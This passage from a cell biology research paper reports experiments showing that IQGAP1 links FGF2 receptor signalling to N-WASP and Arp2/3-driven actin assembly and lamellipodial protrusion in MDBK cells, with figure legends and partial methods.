IQGAP1 can be overcome by binding of GTP-Cdc42 or GTP-Rac1 to IQGAP1, which dissociates IQGAP1 from E-cadherin and β-catenin (Fukata et al., 1999). At least one other potential explanation for the role of IQGAP1 in cell motility is well worth considering. The direct binding of IQGAP1 to F-actin in vitro (Bashour et al., 1997; Fukata et al., 1997) and its extensive colocalization with actin filaments in lamellipodia (Bashour et al., 1997; Yamashiro et al., 2003) could reflect a role for IQGAP1 in controlling cell motility through regulation of actin dynamics. The force for lamellipodial protrusion, and by extension, cell motility, is provided by assembly of branched actin filament networks at the leading edges of motile cells. Assembly of these networks is thought to involve the Arp2/3 complex (Machesky et al., 1994) to nucleate new filaments from the sides of pre-existing filaments, and activators of the Arp2/3 complex, such as neural Wiskott-Aldrich Syndrome protein (N-WASP), WASP and the WAVE proteins, which themselves require activation by additional factors (Pollard and Borisy, 2003). The study described here employed a combination of cell biological, biochemical and biophysical approaches to determine if regulation of cortical actin assembly by IQGAP1 underlies its critical role in cell motility. We demonstrate that IQGAP1 is part of the molecular machinery that stimulates branched actin filament nucleation and lamellipodial protrusion, and present evidence that activation of growth factor receptors is a common mechanism to engage this function of IQGAP1. Furthermore, because numerous proteins involved in promoting branched actin filament assembly failed to accumulate at the cell surface following receptor activation of IQGAP1-depleted cells, our results suggest that IQGAP1 coordinates the recruitment and activation of these proteins at the leading edge of motile cells. Results FGF2 stimulates cell motility through IQGAP1 To test the hypothesis that IQGAP1 regulates actin filament dynamics in response to activation of cell surface receptors other than VEGFR2, we began by examining motility of Madin-Darby bovine kidney (MDBK) cells stimulated with fibroblast growth factor 2 (FGF2). We chose FGF2 for this study because one of its principal receptors is FGFR1, whose cytoplasmic domain contains a region with 55% amino acid identity to the IQGAP1-binding region of VEGFR2 (Yamaoka-Tojo et al., 2004). Cell motility was induced in serum-starved MDBK cells by FGF2, and found to be tightly coupled to IQGAP1 expression. Wounds were scraped into confluent monolayers of serum-starved cells that had been treated with siRNA to reduce IQGAP1 protein levels to ∼20% of normal (Fig. 1A) and FGF2 was added to the cultures 2 hours later. As shown by phase contrast microscopy in Fig. 1B (also see Fig. 5C for quantification), within 7 hours after introduction of FGF2, nearly full wound closure was observed in control cultures treated with scrambled RNA (scrRNA), but wounds scraped in confluent cultures of IQGAP1-depleted cells closed only partially. Most wound closure in control cultures was dependent on FGF2, because broad wounds persisted for more than 24 hours in cultures that were not stimulated with FGF2. We thus conclude that FGF2 stimulates migration of MDBK cells through a pathway that requires IQGAP1. The impaired ability of IQGAP1-depleted cells to migrate in the wound healing assay resulted from a dramatic inhibition of FGF2-stimulated lamellipodial dynamics. Cells that had been treated with IQGAP1 siRNA or scrRNA were subcultured at low density, allowed to attach and spread on coverslips in serum-containing medium overnight, transferred to serum-free medium for 18 hours, and finally stimulated with FGF2. Images of individual cells that were not in direct contact with any neighboring cells were recorded by time-lapse, phase contrast microscopy before and after FGF2 stimulation. Timelines of lamellipodial protrusion and retraction were displayed as kymographs (Hinz et al., 1999), which facilitated visual and quantitative comparisons of lamellipodial behavior in cells containing normal versus diminished levels of IQGAP1. Typical kymographs are shown in Fig. 2A. The control cell kymograph demonstrated a high density of sharp, steadily advancing narrow peaks, each of which represented a rapid cycle of lamellipodial protrusion and retraction that resulted in net forward movement of the cell margin. By comparison, the kymograph of the IQGAP1-depleted cell contained only a few, much broader peaks, and indicated little, if any advance of the cell margin. Fig. 1. IQGAP1 is required for FGF2-stimulated migration of MDBK cells. (A) MDBK cells were transfected with IQGAP1-specific siRNA or scrambled RNA (scrRNA) using a Nucleofector. To allow direct visual comparison of IQGAP1 levels in the two samples by western blotting, a concentration series of each cell extract was analyzed at the indicated relative dilutions. Note that siRNA reduced the IQGAP1 level to ∼20% of normal, but had no effect on cellular actin content. (B) Confluent monolayers were then serum-starved for 8 hours, wounded with a micropipette tip, and 2 hours later were stimulated with 25 ng/ml FGF2. Note that movement of IQGAP1-depleted cells into the wound, as seen after 7 hours of FGF2 exposure, was severely impaired, and that broad wounds persisted for more than 24 hours after wounding in both scrRNA-treated and IQGAP1-depleted cells that were not stimulated with FGF2. The impression obtained from this representative pair of kymographs was reinforced by quantitative analysis of three distinct parameters of lamellipodial dynamics: the frequency of forming protrusions, the velocity with which protrusions advanced, and the persistence of protrusions (Fig. 2B; and for detailed statistics, including post-hoc comparisons, see supplementary material, Table S1). Comparison of control and IQGAP1-depleted cells prior to FGF2 stimulation indicated that their protrusion frequencies were indistinguishable, but that protrusions in control cells had a 34% higher velocity and a 39% lower persistence. Fig. 2. Reduced lamellipodial dynamics in IQGAP1-depleted cells. Individual cells in sparse cultures that were serum-starved for 18 hours were imaged by phase contrast, time-lapse microscopy for 5 minutes before FGF2 was added to a final concentration of 25 ng/ml, and for 10 minutes thereafter. (A) Kymographic images (right panels) obtained from the indicated regions of interest (roi) at the margins of individual cells (left panels) treated with scrRNA or siRNA. Note how dynamic and motile the cell margin was in the control, scrRNA-treated cells compared to the cell depleted of IQGAP1 with siRNA. (B) Comparative responses of scrRNA-treated control (–) and IQGAP1 siRNA-treated (+) cells to FGF2 stimulation. The three parameters of lamellipodial dynamics that were measured before and after FGF2 stimulation were frequency, velocity and persistence of protrusion. The raw data were obtained from 180 regions of interest (roi) in 19 scrRNA-treated control cells, and from 180 roi in 21 siRNA-treated cells. Error bars indicate s.e.m. Differences between groups were analyzed using a one-way ANOVA test. Statistically significant differences at α=0.001 are indicated by * for control versus siRNA-treated cells after FGF2 exposure (see supplementary material Table S1 for detailed statistics, including post-hoc comparisons). The net conclusion is that control cells, but not IQGAP1-deficient cells, respond to FGF2 by making more dynamic lamellipodia. After FGF2 stimulation, lamellipodial behavior was strikingly different between control and IQGAP1-depleted cells. Addition of FGF2 to control cells caused protrusion frequency and velocity to increase by 224% and 64%, respectively, but protrusion persistence was unchanged. By contrast, addition of FGF2 to IQGAP1-depleted cells did not change the frequency of protrusions or their velocity, but did cause protrusion persistence to increase by 105%. Loss of IQGAP1, therefore, potently inhibited the ability of FGF2 to induce protrusions and increase the speeds at which they advanced, but caused protrusions that were able to form following FGF2 stimulation to be more long lasting. Despite this increased protrusion persistence, the net result of knocking down IQGAP1 was to prevent FGF2 from inducing productive protrusions. It is likely that the relatively inactive lamellipodia in IQGAP1-deficient cells stimulated with FGF2 accounted for their reduced migration in wound healing assays (Fig. 1B and Fig. 5C). FGF2 induces intracellular association of IQGAP1 with N-WASP, the Arp2/3 complex and FGFR1 Because waves of lamellipodial protrusion are associated with periods of actin assembly (Pollard and Borisy, 2003), and IQGAP1 concentrates in lamellipodia and binds F-actin (Bashour et al., 1997), we investigated whether proteins that regulate actin assembly associated with IQGAP1 after FGF2 stimulation. IQGAP1 was immunoprecipitated from low-density cultures containing islands of relatively small numbers of cells (approximately 10-100 cells per island) before FGF2 stimulation and at various time points thereafter. As a control for non-specific immunoprecipitation, the tau-1 an antibody to tau, which is not expressed in MDBK cells, was substituted for anti-IQGAP1 10 minutes after FGF2 stimulation. The IQGAP1 immunoprecipitates contained time-dependent increases in coimmunoprecipitated N-WASP, Arp3 and FGFR1 beginning as early as 10 minutes after FGF2 stimulation, but none of the proteins assayed by western blotting were immunoprecipitated by anti-tau (Fig. 3A). Arp3 is a subunit of the Arp2/3 complex (Machesky et al., 1994), which coordinates with N-WASP to assemble branched actin filament networks (Pollard and Borisy, 2003). WAVE2, a different Arp2/3 complex activator that has been implicated specifically in lamellipodial protrusion (Yamazaki et al., 2003; Yan et al., 2003), was readily detectable in MDBK cell lysates by immunoblotting, but did not coimmunoprecipitate with IQGAP1 before or after FGF2 stimulation of serum-starved cells (not shown). Using purified proteins for in vitro binding assays, we determined that IQGAP1 binds directly to the cytoplasmic domain of FGFR1 and to N-WASP, and acts as a bridge for indirect association of FGFR1 and N-WASP (Fig. 3B and Fig. 8C). Fig. 3. FGF2 stimulates recruitment of IQGAP1, N-WASP, Arp2/3 complex and FGFR1 to lamellipodia. (A) Low-density cultures of serum-starved MDBK cells were stimulated with FGF2, and lysed at various times thereafter. At each indicated time point, IQGAP1 was immunoprecipitated out of the lysates with monoclonal anti-IQGAP1, and the immunoprecipitates were analyzed by immunoblotting with antibodies to IQGAP1 (polyclonal), N-WASP, Arp3 and FGFR1. As a control for non-specific immunoprecipitation, the tau-1 monoclonal antibody to tau, which is not expressed in MDBK cells, was substituted for monoclonal anti-IQGAP1, 10 minutes after FGF2 stimulation. Note that the IQGAP1 immunoprecipitates contained time-dependent increases in the levels of coimmunoprecipitated N-WASP, Arp3 and FGFR1, and that none of the proteins assayed by western blotting were immunoprecipitated by anti-tau. (B) Glutathione-Sepharose 4B beads were loaded with a fusion protein of the FGFR1 cytoplasmic tail coupled to GST, or to GST alone, and the beads were then mixed with IQGAP1, N-WASP, or both, and finally immunoblotting was used to detect any IQGAP1 or N-WASP that may have bound to the beads. Immunoblotting demonstrated direct binding of IQGAP1 and indirect, IQGAP1-dependent association of N-WASP with GST-FGFR1 tail, but not with GST. Low-density MDBK cultures were also stained by double fluorescence microscopy for IQGAP1 plus FGFR1, N-WASP, Arp3 or F-actin. As shown in Fig. 4, FGF2 induced recruitment of IQGAP1 and the other four proteins to lamellipodia, where they colocalized extensively. These results place IQGAP1 predominantly within a cortical region where actin filament nucleation occurs and FGFR1 accumulates beyond basal levels following FGF2 stimulation. In FGF2-stimulated cells depleted of IQGAP1 with siRNA, however, FGFR1, N-WASP and Arp3 were not recruited to the cortex, and F-actin-rich lamellipodia failed to form. Impaired wound healing by N-WASP-depleted MDBK cells The evidence presented to this point raised the possibility that N-WASP, like IQGAP1, is required in MDBK cells for FGF2-stimulated lamellipodial protrusion and cell motility. To test this hypothesis, MDBK cells were depleted of N-WASP with siRNA, and tested for FGF2-stimulated wound healing. As illustrated in Fig. 5, wound healing in N-WASP-deficient cultures was severely impaired, and quantitatively similar to the poor wound healing observed in IQGAP1-depleted cultures. Thus, in contrast to other cellular systems in which WAVE2 was found to support lamellipodial advance (Yamazaki et al., 2003; Yan et al., 2003), FGF2-stimulated lamellipodial protrusion in MDBK cells requires N-WASP. IQGAP1 stimulates branched actin filament nucleation through N-WASP and the Arp2/3 complex The requirement for both IQGAP1 and N-WASP for FGF2-dependent cell migration, and for intracellular association of IQGAP1, N-WASP and the Arp2/3 complex suggested that these three factors work in concert to stimulate actin filament nucleation. This hypothesis was verified using a spectrofluorometric assay for assembly of pyrene-labeled actin (Bryan and Coluccio, 1985) (Fig. 6A). In the presence of 1.3 μM actin, 50 nM Arp2/3 complex and 50 nM N-WASP, the maximum actin assembly rate (Vmax) and shortest lag time to reach Vmax was achieved at an IQGAP1 concentration of 30 nM. Compared to samples containing 30 nM IQGAP1, control samples that lacked IQGAP1 assembled with an ∼50% slower Vmax and took four to five times longer to reach Vmax. Lesser stimulation of actin assembly, or none at all, was observed at lower and higher IQGAP1 concentrations. IQGAP1 thus stimulates actin nucleation by the Arp2/3 complex and N-WASP, but within a narrow concentration range, suggesting that the effects of IQGAP1 on actin assembly reflect a concentration-dependent balance between stimulatory and inhibitory activities. Similar results were obtained at Arp2/3 complex concentrations of 30-100 nM, and at N-WASP concentrations of 30-350 nM (as in Fig. 7A). IQGAP1 did not stimulate actin assembly appreciably in the absence of other factors, and stimulation required the presence of both the Arp2/3 complex and N-WASP (Fig. 6B). Taken together, these results establish IQGAP1 as a novel activator of N-WASP. Fig. 4. IQGAP1-dependent recruitment of N-WASP, Arp3 and FGFR1 to the cell periphery after FGF2 stimulation. Immunofluorescence microscopy revealed co-recruitment and colocalization of IQGAP1, N-WASP, Arp3 and FGFR1 to lamellipodia after FGF2 stimulation for 10 minutes, of low-density cultures of serum-starved MDBK cells containing IQGAP1 (Control cells). FGF2 was unable to recruit N-WASP, Arp3 and FGFR1 to cell margins in IQGAP1-deficient, siRNA-treated cells. To improve visualization of cell margins and intracellular details in IQGAP1-depleted cells, micrograph exposures for the siRNA samples were twice as long in the TRITC channel and 4.5 times longer in the FITC channel as they were for the scrRNA samples. Fig. 5. N-WASP is required for FGF2-stimulated migration of MDBK cells. (A) MDBK cells were transfected with N-WASP-specific siRNA or scrambled RNA (scrRNA) using a Nucleofector. To allow direct visual comparison of N-WASP levels in the two samples by western blotting, a concentration series of each cell extract was analyzed at the indicated relative dilutions. Note that siRNA reduced the N-WASP level to ∼1/3 of normal, but had no effect on cellular IQGAP1 content. (B) Confluent monolayers were then serum-starved for 8 hours, wounded with a micropipette tip, and 2 hours later were stimulated with 25 ng/ml FGF2. Note that movement of N-WASP-depleted cells into the wound after 9 or 24 hours of FGF2 exposure was severely impaired. (C) Percentage of wound closure was quantified by measuring the average width of eight randomly chosen regions of interest of each wound at 0, 9, and 24 hours after FGF2 addition. Data are expressed relative to the average wound widths at 0 hours. Error bars indicate standard deviations for three experiments, and asterisks (*), indicate significant differences between scrRNA controls and corresponding siRNA-treated cultures at α<0.001. Confirmation that IQGAP1 promoted branched actin filament nucleation was obtained by direct visualization of actin polymerization stimulated by IQGAP1 in the presence of the Arp2/3 complex and N-WASP, by total internal reflection fluorescence (TIRF) microscopy (Kuhn and Pollard, 2005) (Fig. 6C and supplementary material, Movie 1). The rates at which total filament length increased with or without IQGAP1 were similar until ∼100 seconds, when the rate began to increase more rapidly in the IQGAP1-containing sample (Fig. 6D). The time point for this transition was also marked by a large increase in the rate at which filament branches appeared in the IQGAP1-containing sample. Indeed, by plotting the number of branches per μm of filament length as a function of time, it became apparent that after 100 seconds of assembly, the density of branches in the presence of IQGAP1 was four- to fivefold higher than in its absence, relatively constant with time for the next 500 seconds, and comparable to what was observed when an optimal concentration of GTP-bound Cdc42, a robust N-WASP activator (Rohatgi et al., 2000; Rohatgi et al., 1999), was used in place of IQGAP1 (Fig. 6E). These results confirm and extend the conclusion from spectrofluorometric assays (Fig. 6A) that IQGAP1 stimulates branched actin filament nucleation by activating N-WASP, and by extension, the Arp2/3 complex. In addition to binding and activating N-WASP, GTP-activated Cdc42 binds directly to IQGAP1 (Hart et al., 1996; Kuroda et al., 1996; McCallum et al., 1996). We therefore compared the ability of activated Cdc42 and IQGAP1, individually and together, to stimulate actin assembly (Fig. 7A). In the presence of 2 μM actin, 50 nM Arp2/3 complex and 350 nM N-WASP, optimal concentrations of activated Cdc42 (105 nM) and IQGAP1 (35 nM) promoted actin polymerization nearly identically. When both Cdc42 and IQGAP1 were present, however, the lag time before Vmax was reached was dramatically reduced and the peak assembly rate increased additively. Similar results were obtained when the concentrations of actin, Arp2/3 complex and N-WASP were as low as 1.3 μM, 30 nM and 50 nM, respectively. IQGAP1 and activated Cdc42 can thus work in concert to drive especially rapid nucleation of actin filament branches. To investigate why stimulation of actin assembly occurs within a narrow range of IQGAP1 concentrations (Fig. 6A and Fig. 8B), we monitored effects of IQGAP1 on assembly stimulated by the Arp2/3 complex plus the N-WASP VCA fragment, which constitutively activates the Arp2/3 complex (Rohatgi et al., 1999). As shown in Fig. 7B, IQGAP1 did not bind GST-VCA, but did exhibit dose-dependent inhibition of actin assembly in the presence of GST-VCA plus the Arp2/3 complex. By contrast, IQGAP1ΔNT, which lacks the first 156 N-terminal amino acids of full-length IQGAP1 and does not bind F-actin (see supplementary material Fig. S1), had no effect on actin assembly stimulated by GST-VCA and the Arp2/3 complex. These data suggest that high concentrations of full-length IQGAP1 are less effective at stimulating actin assembly by the Arp2/3 complex and N-WASP because of competition between IQGAP1 and the Arp2/3 complex for binding to existing actin filaments, where the Arp2/3 complex most efficiently nucleates new actin filaments. Stimulation of actin assembly through N-WASP and the Arp2/3 complex was also observed for three progressively smaller N-terminal IQGAP1 fragments (Fig. 8A,B): IQGAP12-522, a homodimer that binds F-actin (Mateer et al., 2002), IQGAP12-210, an F-actin binding monomer (Mateer et al., 2004), and IQGAP12-71, a presumptive monomer that does not bind F-actin (Mateer et al., 2004). By contrast, IQGAP1ΔNT showed little evidence of assembly stimulation. Like full-length IQGAP1, each N-terminal fragment had an optimal concentration for stimulating the rate of actin assembly. The Vmax for each fragment at its optimal concentration was similar to that observed for full-length IQGAP1, although the lag time before Vmax was reached was much longer for the stimulatory fragments than for full-length IQGAP1 (Fig. 8B). We, therefore, conclude that several N-terminal fragments of IQGAP1 can stimulate actin assembly in the presence of the Arp2/3 complex and N-WASP, albeit not as well as full-length IQGAP1. Furthermore, this stimulatory activity of IQGAP1 does not require dimerization or binding to actin filaments. Fig. 6. Stimulation of branched actin filament assembly by IQGAP1. (A) Effects of IQGAP1 on actin (5% labeled with pyrene) assembly in the presence of N-WASP and the Arp2/3 complex were monitored using a pyrene-actin fluorescence assay. Note that maximal stimulation of assembly was achieved at 30 nM IQGAP1, and that higher and lower concentrations stimulated less or not at all. (B) Actin assembly stimulation by IQGAP1 requires N-WASP plus Arp2/3 complex. (C) IQGAP1-stimulated assembly of branched actin filament networks observed directly by TIRF microscopy. (D) Total lengths of actin filaments observed by TIRF microscopy were measured as a function of time, for samples containing or lacking IQGAP1 or activated Cdc42, a previously described for the N-WASP activator (Rohatgi et al., 1999). Maximum rates of actin assembly were achieved in the IQGAP1 sample. (E) The same micrographs were used to determine the number of filament branch points per μm of actin filament as a function of time. Note that the IQGAP1 and Cdc42 samples quickly attained a filament branch density four- to fivefold greater than the control sample that contained neither IQGAP1 nor Cdc42. Actin assembly stimulation in the presence of the Arp2/3 complex and N-WASP is well correlated with direct binding of IQGAP1 or IQGAP1 fragments to N-WASP. Purified, N-terminally his-tagged versions of full-length IQGAP1, IQGAP12-522, IQGAP12-210, IQGAP12-71, and IQGAP1ΔNT were bound to nickel-agarose beads and mixed with purified N-WASP. Fig. 8C demonstrates that N-WASP bound specifically to all IQGAP1 proteins tested. These results establish the presence of an N-WASP binding region near the N terminus of IQGAP1, and imply that binding underlies N-WASP activation. The ability of IQGAP1ΔNT to bind N-WASP, but its borderline ability to stimulate actin assembly indicates, however, that binding and activation of N-WASP are separable. Using similar nickel-agarose pull-down assays, we did not detect direct binding of IQGAP2 to the Arp2/3 complex (not shown). Fig. 7. Co-stimulation of actin assembly by IQGAP1 plus activated Cdc42, and inhibition of VCA-stimulated actin assembly by IQGAP1. (A) When used together, IQGAP1 and activated Cdc42 stimulated actin assembly rates additively, and virtually eliminated the lag period before peak assembly rates were reached using either IQGAP1 or activated Cdc42 alone. (B) In the presence of a GST-tagged, constitutively active, N-WASP VCA fragment, IQGAP1, but not IQGAP1ΔNT, caused dose-dependent inhibition of assembly. Discussion The collective data presented here suggest that activation of a cell surface receptor, FGFR1, by one of its extracellular ligands, FGF2, recruits IQGAP1 to the cortically localized cytoplasmic domain of the receptor. IQGAP1 then promotes branched actin filament nucleation through N-WASP and the Arp2/3 complex, and as a result, lamellipodial protrusion, in the immediate vicinity of activated receptors. This mechanism by which IQGAP1 serves as an intermediate between growth factor signaling, and cellular morphogenesis and motility likely applies to IQGAP1-dependent migration of endothelial cells stimulated by VEGF binding to VEGFR2 (Yamaoka-Tojo et al., 2004), and may apply to other growth factor-receptor pairs that await identification. A different member of the IQGAP family, IQGAP2, which is 62% identical in amino acid sequence to IQGAP1 (Brill et al., 1996), may use a related mechanism to trigger actin assembly and cellular morphogenesis in platelets. The filopodia and lamellipodia that platelets elaborate after thrombin activation may owe their formation to thrombin-induced macromolecular assemblies of IQGAP1, actin and the Arp2/3 complex (Schmidt et al., 2003). A key question that remains unanswered is why suppression of IQGAP1 protein levels so dramatically reduces cell motility (Fig. 1 and Fig. 5C) (see also Mataraza et al., 2003; Watanabe et al., 2004; Yamaoka-Tojo et al., 2004) when several N-WASP-independent pathways for activating Arp2/3 complex-mediated cell motility are known to exist (Miki and Takenawa, 2003), and WAVE2 (Suetsugu et al., 2003; Yamazaki et al., 2003), rather than N-WASP (Benesch et al., 2005), is thought to be the principal Arp2/3 complex activator for lamellipodial advance. Among many possible explanations worth exploring are that specific receptor-ligand pairs, such as FGFR1-FGF2 and VEGFR2-VEGF, trigger Arp2/3 complex activation primarily through IQGAP1 and N-WASP, that N-WASP is not the only Arp2/3 complex activator that can be stimulated by IQGAP1, and that actin assembly stimulated by IQGAP1 indirectly supports lamellipodial protrusion. Regarding the last possibility, IQGAP1 knockdown may impair cell motility because it reduces the levels of activated Cdc42 and Rac1 (Mataraza et al., 2003), which are known to stimulate the Arp2/3 complex indirectly through activation of WASP/WAVE proteins (Pollard and Borisy, 2003). Alternatively, receptor trafficking, which could be required for sustained cell migration in response to extracellular growth factors, may depend on actin assembly stimulated by IQGAP1. In favor of the receptor trafficking model is evidence that N-WASP, along with the Arp2/3 complex, is recruited to clathrin-coated pits as they invaginate, and is required for receptor-mediated endocytosis of EGF receptors (Benesch et al., 2005). Considering the ability of IQGAP1 to bind N-WASP directly (Fig. 8C) and to stimulate actin assembly through N-WASP and the Arp2/3 complex (Fig. 6), it is possible that IQGAP1 is necessary for normal FGFR1 trafficking, at least at the step of receptor endocytosis, which in turn might be required for formation of productive protrusions in cells stimulated by FGF2. Fig. 8. IQGAP1 fragments stimulate actin assembly and bind N-WASP. (A) A schematic representation of functional domains present in recombinant full-length IQGAP1 and four fragments used for experiments documented here: CHD, F-actin-binding calponin homology domain; IR, IQGAP repeats that mediate homodimerization; WW, ERK2-binding WW domain; IQ, calmodulin-binding IQ motifs; GRD, GAP (GTPase activating protein)-related domain involved in binding activated Cdc42 and Rac1. All proteins were his-tagged at their N termini, and the diagrams indicate whether each protein is a monomer or homodimer in aqueous solution. (B) The pyrene actin assembly assay was used to evaluate each protein at several concentrations in the presence of 1.3 μM actin (5% pyrene-labeled), 50 nM N-WASP and 50 nM Arp2/3 complex. Shown here are the maximum velocities (Vmax) of actin assembly (upper panels) and lag times before Vmax was reached (lower panels). Note that optimal concentrations of all recombinant proteins, except IQGAP1ΔNT, supported a Vmax approx. twofold higher than controls that contained only actin, N-WASP and Arp2/3 complex, but that the optimal concentration of full-length IQGAP1 (IQGAP1FL) reached Vmax at least twice as fast as the fragments. (C) N-WASP was mixed with nickel-agarose beads or nickel-agarose beads that were pre-loaded with recombinant, his-tagged IQGAP1FL, IQGAP1ΔNT, IQGAP12-522, IQGAP12-210, IQGAP12-71, or tau as a negative control. Beads contained an approx. twofold molar excess of his-tagged proteins relative to N-WASP, and chemiluminescent immunoblotting was used to detect any N-WASP that may have bound to beads. Note the specific binding of N-WASP to all forms of IQGAP1 that were tested. The slightly increased electrophoretic mobility of N-WASP in the IQGAP12-522 pull-down assay probably represents a gel artefact caused by that fact N-WASP and IQGAP12-522 migrate nearly identically in SDS-PAGE. An equally attractive possibility concerns the mechanical strength of branched actin filament networks. IQGAP1 is a homodimeric protein that can crosslink actin filaments (Bashour et al., 1997) because it contains an F-actin binding calponin homology domain on each of its two identical subunits (Mateer et al., 2004). By joining N-WASP and the Arp2/3 complex in a supramolecular complex that nucleates actin filament branches, IQGAP1 may reside at the junction of mother and daughter filaments in branched filament networks, where it would be ideally positioned to crosslink mother and daughter filaments, and thus might provide branched filament networks with increased mechanical integrity. Fortifying filament networks in such a manner could allow filaments that are at the leading edge and anchored to the lamellipodial network to push forward the plasma membrane more effectively as filament polymerization proceeds. We are not aware of any protein other than IQGAP1 that both stimulates branched actin filament nucleation through the Arp2/3 complex and crosslinks actin filaments. Thus, even if IQGAP1 was a relatively minor stimulator of the Arp2/3 complex in most cellular contexts, its actin filament crosslinking activity could be crucial for formation of productive lamellipodia. Although direct binding of activated Cdc42 to N-WASP allows N-WASP to stimulate the actin filament nucleating activity of the Arp2/3 complex in vitro in the absence of additional factors (Rohatgi et al., 1999), other proteins could play very important roles in this process. For example, WASP-interacting protein (WIP)-mediated inhibition of N-WASP can be relieved by activated Cdc42, but in a manner dependent on forming binding protein 1-like (FNBP1L, also known as Toca-1), which binds both activated Cdc42 and N-WASP (Ho et al., 2004). By comparison, and as shown here, IQGAP1 can bind and stimulate N-WASP independently of activated Cdc42 (Fig. 6, Fig. 7A and Fig. 8C), but can also act cooperatively with activated Cdc42 to promote actin filament nucleation in vitro through N-WASP and the Arp2/3 complex (Fig. 7A). In the latter case, IQGAP1, like Toca-1, may engage activated Cdc42 and N-WASP as a complex that sustains a high level of filament formation at the leading edge of motile cells. The increased number of lamellipodial protrusions and their faster rate of forward extension after stimulation of MDBK cells with FGF2 are consistent with this idea. The fact that IQGAP1 depletion leads to reduced levels of activated Cdc42 and Rac1 in cells (Mataraza et al., 2003) provides additional support for this notion. Cdc42 binds IQGAP1 with 50-fold higher affinity than it binds WASP, a protein closely related to N-WASP (Zhang et al., 1997), so IQGAP1 could serve to anchor activated Cdc42 in close association with N-WASP. Finally, IQGAP1 and WASP interact with physically distinct regions of activated Cdc42 (Li et al., 1999), so maximal activation of N-WASP might be achieved by simultaneous interactions of activated Cdc42 with both IQGAP1 and N-WASP. Thus, a Cdc42-IQGAP1 complex, rather than Cdc42 and IQGAP1 acting independently, may be responsible for maintaining N-WASP-dependent and Arp2/3 complex-dependent protrusive activity. On the other hand, binding of activated Cdc42 to IQGAP1 would also be expected to increase cell-cell adhesion by dissociating IQGAP1 from E-cadherin and β-catenin, and thereby strengthen the cadherin-catenin-actin connection that acts as a counterforce to cell migration (Kuroda et al., 1998). The apparent migration-promoting and cell-cell adhesion promoting activities of IQGAP1 are not necessarily in conflict, but it seems unlikely that decreased intercellular adhesion underlies IQGAP1-dependent cell motility induced by FGF2. On the contrary, assuming that one effect of FGF2 stimulation was an increase in IQGAP1-dependent intercellular adhesion, that effect must be overwhelmed by IQGAP1-dependent actin assembly and consequent lamellipodial protrusion induced by FGF2. The failure of FGFR1, N-WASP and the Arp2/3 complex to be recruited to the cell cortex following FGF2 stimulation of IQGAP1-deficient cells (Fig. 4) indicates that IQGAP1 plays a far broader role in cell motility than merely stimulating actin filament nucleation. IQGAP1 also appears to recruit to the cell surface many key components of the motile machinery. This finding is reminiscent of recent reports that IQGAP1 integrates the actin and microtubule cytoskeletons by binding directly to both CLIP-170 and APC, which are microtubule plus end tracking proteins (Fukata et al., 2002; Watanabe et al., 2004). IQGAP1 may thus be a master organizer of signal transduction, cytoskeletal and cell adhesion molecules that act cooperatively to regulate cell motility and morphogenesis. We suggest in particular that the interaction of IQGAP1 with FGFR1 represents a critical step that bridges extracellular signals with cellular responses. IQGAP1 may establish or maintain FGF2-dependent signaling by regulating the polarized distribution of FGFR1 receptors at the cell surface. Through its F-actin binding activity, IQGAP1 may stabilize connections among cell surface FGFR1, cortical F-actin and the machinery that powers cell movement. In this regard, IQGAP1 and N-WASP may function to maintain FGFR1 homeostasis at the plasma membrane. Materials and Methods Antibodies The following antibodies were used: primary mouse monoclonal anti-IQGAP1 (Mateer et al., 2002), anti-actin (Chemicon) and tau-1 (Binder et al., 1985), and rabbit polyclonal antibodies to IQGAP1 (Mateer et al., 2002), N-WASP (Santa Cruz), Arp3 (Welch et al., 1997) and FGFR1 (Santa Cruz). Secondary antibodies included goat anti-mouse IgG and goat anti-rabbit IgG labeled with FITC or TRITC (Southern Biotech, Birmingham, AL), goat anti-mouse IgG labeled with Alexa Fluor-647 (Molecular Probes), and goat anti-mouse IgG and goat-anti rabbit IgG labeled with horseradish peroxidase (KPL Inc., Gaithersburg, MD). Cell culture, IQGAP1 and N-WASP knockdown, and wound healing MDBK (Madin-Darby bovine kidney) epithelial cells were obtained from the American Type Culture Collection and maintained in Dulbecco's miminum essential medium (Gibco) plus 10% Cosmic calf serum (HyClone). siRNA for bovine IQGAP1 (target sequence: AAGGCTGAGCTGGTGAAACTG) and a scrambled (scrRNA) control (target sequence: AAGTACCAGGGACGTGAGTGT) were purchased from Qiagen as Alexa Fluor-647-labeled products. siRNA for N-WASP was purchased from Dharmacon (catalogue no. D-006444-06), and according to the manufacturer was directed against a human N-WASP sequence that is identical to the corresponding bovine N-WASP sequence. 2 μg of siRNA specific for IQGAP1 or N-WASP, or 2 μg of scrRNA were transfected into MDBK cells using a Nucleofector (Amaxa, Cologne, Germany) and the protocol specifically recommended by the manufacturer for MDBK cells (Nucleofector Kit R and program X-001). 48-72 hours after transfection, confluent monolayers of cells that were growing in 24-well dishes and had been serum starved for the previous 8 hours were wounded by scratching with a micropipette tip. The cells were allowed to recover for 2 hours, after which media were replaced with fresh media containing or lacking 25 ng/ml FGF2 (Sigma). Phase contrast micrographs of the cultures were taken within 30 minutes after wounding and at various times thereafter using Scion Image software (Scion, Frederick, MD) and a Cohu model 2222-1000 camera mounted on a Nikon Diaphot microscope with a Nikon 10×, 0.25 NA, phase 1 DL objective. Kymographic analysis MDBK cell cultures were transfected by nucleofection with scrRNA or siRNA and grown to confluence, after which 5×104 cells were subcultured onto 25 mm round, #1 thickness coverslips coated with 5 μg/ml fibronectin (Sigma), and grown overnight in serum-containing medium. The cells were then cultured for at least 14 hours in serum-free medium, and finally for 4 hours in Phenol-Red-free MEM containing 15 mM Hepes (Gibco). Following this MEM acclimation period, cells were imaged by time-lapse phase contrast microscopy at 12 frames per minute beginning 5 minutes before addition of 50 ng/ml FGF2, which occurred 48-72 hours after transfection. Images were captured without binning using a Hamamatsu Orca-ER 1.3 megapixel cooled CCD mounted on a Zeiss Axiovert S100 equipped with a Zeiss 63× 1.4 NA phase 3 planapochromatic objective. Cells were maintained on the microscope stage in Attofluor Cell Chambers (BD Bioscience, Rockville, MD) at 37°C in an atmosphere of 95% air plus 5% CO2. OpenLab 4 software (Improvision) running on a Power Macintosh G4 computer (Apple) was used to control the camera and shutters, and to program the time-lapse parameters. NIH Image 1.62 public domain software (http://rsb.info.nih.gov/nih-image/) was used to generate kymographs of lamellipodia (Hinz et al., 1999) from user-specified regions of interest. Excel 2004 for Mac (Microsoft) was used to generate the bar graphs of protrusion frequency, velocity and persistence shown in Fig. 2B, and SPSS 11 for Mac OS X statistical software (SPSS, Inc.) was used for one-way ANOVA (see supplementary material Table S1). Fluorescence microscopy Cells were fixed and permeabilized either by immersion for 5 minutes in methanol at –20°C, or by successive incubations in 4% 